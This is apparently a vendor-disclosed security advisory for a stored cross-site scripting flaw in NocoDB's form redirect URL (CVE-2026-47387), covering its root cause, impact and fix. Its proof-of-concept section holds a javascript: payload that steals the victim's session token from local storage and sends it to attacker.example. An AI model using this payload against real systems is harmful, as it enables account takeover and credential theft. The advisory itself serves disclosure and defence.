NocoDB: Stored XSS via a form view redirect URL

Advisory ID: TP-2026-007
Product: NocoDB (open-source platform that turns databases into spreadsheets, forms and dashboards)
Vulnerability type: Stored cross-site scripting (CWE-79)
CVE: CVE-2026-47387
CVSS 3.1: 8.7 (High) · CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N
Affected versions: <= 2026.05.0
Fixed in: 2026.05.1
Vendor advisory: GHSA-hj85-ph9q-78jg
Reported: 14 May 2026

Summary

NocoDB is a widely used open-source platform that turns relational databases into spreadsheets, forms and dashboards. A form view can store a redirect URL that the form navigates to after submission; its validation does not effectively check the URL scheme, and the additional same-host check is bypassed by javascript: URLs because their host component is empty. A user with the editor role on any base stores a javascript: payload as the redirect_url; the public share link returns this value unchanged, and as soon as a higher-privileged user submits the form the script runs in NocoDB's origin. It reads the session token from local storage and uses it to make authenticated API calls on behalf of the victim, leading to account takeover. turingpoint verified the end-to-end flow as a stored XSS leading to account takeover and reported it responsibly to the vendor.

Root cause

NocoDB lets a form's post-submit redirect target be stored as redirect_url; the shared-form store validates this value with isValidRedirectUrl, which only checks for a non-empty string and performs no scheme check (packages/nc-gui/composables/useSharedFormViewStore.ts). The submit handler additionally compares the parsed anchor.host of the URL with window.location.host to keep the redirect on the same origin (packages/nc-gui/composables/useSharedFormViewStore.ts). For non-network schemes such as javascript:, data: or file:, the browser sets anchor.host to the empty string, so this same-host comparison never blocks the value and the raw URL is used as the navigation target. The public meta endpoint of the form share returns the stored redirect_url verbatim to every viewer, so an attacker-controlled javascript: URL reaches the victim's browser unfiltered. Any user with the editor role on any base can set redirect_url, and once a viewer submits the form the handler navigates to the javascript: URL, which executes in NocoDB's origin and reads the session token from localStorage['nocodb-gui-v2'].

Proof of Concept

An editor sets the form view's redirect URL to a javascript: payload, and the public share link returns it unchanged:

// Editor sets the form view's redirect URL:
redirect_url = javascript:fetch('https://attacker.example/c?t='+JSON.parse(localStorage['nocodb-gui-v2']).token)

// Public share link of the form:
GET /dashboard/#/nc/form/<shared-view-uuid>
// The meta endpoint returns redirect_url verbatim; on submit the handler navigates to it.

isValidRedirectUrl lets the javascript: scheme through, and the same-host check does not apply because a javascript: URL has no host (anchor.host is empty). On submission of the public form the payload executes in NocoDB's origin, reads the session token from local storage and exfiltrates it to the attacker.

Impact

• A user with the editor role on any base stores a javascript: redirect that executes in the session of any user who submits the public form.
• The session token stolen from local storage allows authenticated API calls on behalf of the victim within their permissions.
• If a higher-privileged user (workspace owner or admin) submits the form, the attacker escalates to that account = full account takeover.
• The payload runs in NocoDB's own origin and needs no interaction beyond the normal single-click form submission.

References

• GHSA-hj85-ph9q-78jg
• CVE-2026-47387
• Fix commit: scheme allowlist in isValidRedirectUrl
• NocoDB Releases